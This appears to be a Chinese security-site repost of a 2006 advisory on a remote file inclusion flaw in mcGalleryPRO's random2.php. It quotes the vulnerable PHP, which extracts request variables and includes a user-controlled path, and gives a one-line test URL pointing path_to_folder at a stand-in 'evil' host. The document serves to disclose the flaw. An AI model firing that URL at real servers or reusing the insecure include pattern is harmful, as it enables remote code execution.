| 网站首页 | 新闻中心 | 系统安全 | 网络安全 | 安全技术 | 下载中心 | 
课件制作网.
收藏本站
设为首页
安全365
MCGalleryPRO random2.php远程文件包含漏洞
MCGalleryPRO random2.php远程文件包含漏洞
作者:佚名 文章来源:不详 点击数: 更新时间:2007-1-26 15:02:28
2006-9-12

发布日期:2006-09-10
更新日期:2006-09-12

受影响系统:
mcGalleryPRO mcGalleryPRO 2006

描述:

BUGTRAQ  ID: 19936

mcGalleryPRO是一款图片收藏管理程序。

mcGalleryPRO的random2.php文件没有正确过滤对path_to_folder参数的输入,允许攻击者通过包含本地或外部资源的任意文件执行PHP代码。

random2.php中有漏洞的代码如下:

if (!empty($_SERVER)) { extract($_SERVER, EXTR_OVERWRITE); }
if (!empty($_GET)) { extract($_GET, EXTR_OVERWRITE); }
if (!empty($_POST)) { extract($_POST, EXTR_OVERWRITE); }
if (!empty($_COOKIE)) { extract($_COOKIE, EXTR_OVERWRITE); }
if (!empty($_SESSION)) { extract($_SESSION, EXTR_OVERWRITE); }

include ("$path_to_folder/admin/common.php");
include ("$path_to_folder/lang/$lang_def");

<*来源:Solpot (chris_hasibuan@yahoo.com)
  
  链接:http://secunia.com/advisories/21850/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://somehost/path_to_mcgallerypro/random2.php?path_to_folder=http://evil

建议:

厂商补丁:

mcGalleryPRO
------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://mcgallerypro.com/

文章录入:admin    责任编辑:admin 
  • 上一篇文章:

  • 下一篇文章:
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
      网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
     
     
     
    Smartgate SSL Server目
    Ixprim CMS theme_manag
    Sun Java System Conten
    PhpWebGallery picture.
    CGMP:思科组管理协议
    Gigabit (1000 Mbps) 
    10 Gigabit Ethernet协议
    GARP协议
    GMRP:GARP 组播注册协议
    GARP VLAN协议

    Copyright © 2006-2008 www.anquan365.com 安全365
    建议使用1024*768分辨率及第三方浏览器对本站进行浏览